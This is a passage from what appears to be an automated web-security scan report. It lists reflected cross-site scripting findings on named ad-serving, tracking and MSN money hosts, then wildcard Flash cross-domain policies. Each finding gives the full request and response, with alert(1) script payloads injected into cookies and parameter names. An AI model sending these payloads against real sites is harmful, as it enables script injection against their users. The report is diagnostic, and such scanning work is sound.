HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:40:25 2011&9b8c5<script>alert(1)</script>dd9b7d29648=&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:40:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351625; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26537

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&9b8c5<script>alert(1)</script>dd9b7d29648', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

5.354. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d02c"-alert(1)-"1076a141a3e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=253
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:31 GMT
Connection: close
Content-Length: 2403

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzCus
...[SNIP]...


if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

5.355. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7e3a"-alert(1)-"37913713bab was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=136
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:45 GMT
Connection: close
Content-Length: 3457

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab';

var zzhasAd=undefined;


                   var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

5.356. http://redacted/home.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /home.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edfff"><script>alert(1)</script>c74f635b791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /home.asp?edfff"><script>alert(1)</script>c74f635b791=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 02:15:43 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//?edfff"><script>alert(1)</script>c74f635b791=1
Content-Length: 100

object moved <a href="http://money.msn.com//?edfff"><script>alert(1)</script>c74f635b791=1">here</a>

5.357. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4755d"><script>alert(1)</script>10ee24922f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /investor/home.aspx?4755d"><script>alert(1)</script>10ee24922f0=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:18 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing?4755d"><script>alert(1)</script>10ee24922f0=1
Content-Length: 108

object moved <a href="http://money.msn.com/investing?4755d"><script>alert(1)</script>10ee24922f0=1">here</a>

5.358. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec77d"style%3d"x%3aexpression(alert(1))"dc5f63f4feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec77d"style="x:expression(alert(1))"dc5f63f4feb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /investor/home.aspx?ec77d"style%3d"x%3aexpression(alert(1))"dc5f63f4feb=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:03:22 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing?ec77d"style="x:expression(alert(1))"dc5f63f4feb=1
Content-Length: 112

object moved <a href="http://money.msn.com/investing?ec77d"style="x:expression(alert(1))"dc5f63f4feb=1">here</a>

5.359. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7665/13236/25159-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc63c"-alert(1)-"cbcff432d44 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/7665/13236/25159-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3297869551067506954; khaos=GIPAEQ2D-C-IOYY; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=fc63c"-alert(1)-"cbcff432d44; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7665/13236; expires=Sun, 30-Jan-2011 03:17:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 30-Jan-2011 03:17:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=7531^1&13236^2; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=106942; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3189870.js^1^1296353857^1296353857&3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 02:17:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2102

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3189870"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=fc63c"-alert(1)-"cbcff432d44\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.360. http://s18.sitemeter.com/js/counter.asp [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db31b"%3balert(1)//e45c3d069cd was submitted in the IP cookie. This input was echoed as db31b";alert(1)//e45c3d069cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp HTTP/1.1
Host: s18.sitemeter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: IP=173%2E193%2E214%2E243db31b"%3balert(1)//e45c3d069cd;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7206
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:28:56 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243db31b";alert(1)//e45c3d069cd";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

5.361. http://s18.sitemeter.com/js/counter.js [IP cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s18.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9ea8"%3balert(1)//3ef96a62d10 was submitted in the IP cookie. This input was echoed as c9ea8";alert(1)//3ef96a62d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js HTTP/1.1
Host: s18.sitemeter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: IP=173%2E193%2E214%2E243c9ea8"%3balert(1)//3ef96a62d10;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7206
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:28:57 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243c9ea8";alert(1)//3ef96a62d10";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

5.362. http://redcated/PTR/jview/240321567/direct [AA002 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /PTR/jview/240321567/direct

Issue detail

The value of the AA002 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f364'-alert(1)-'aa543a3cef9 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-37866079f364'-alert(1)-'aa543a3cef9; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 420
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:41 GMT

document.writeln('<scr' + 'ipt src="' + 'http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link' + '/ATCI=' + '1294100002-37866079f364'-alert(1)-'aa543a3cef9' + '">
...[SNIP]...

6. Flash cross-domain policy
There are 105 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.ae.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.ae.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.ae.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 17:22:35 GMT
Date: Sun, 30 Jan 2011 14:48:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.2. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

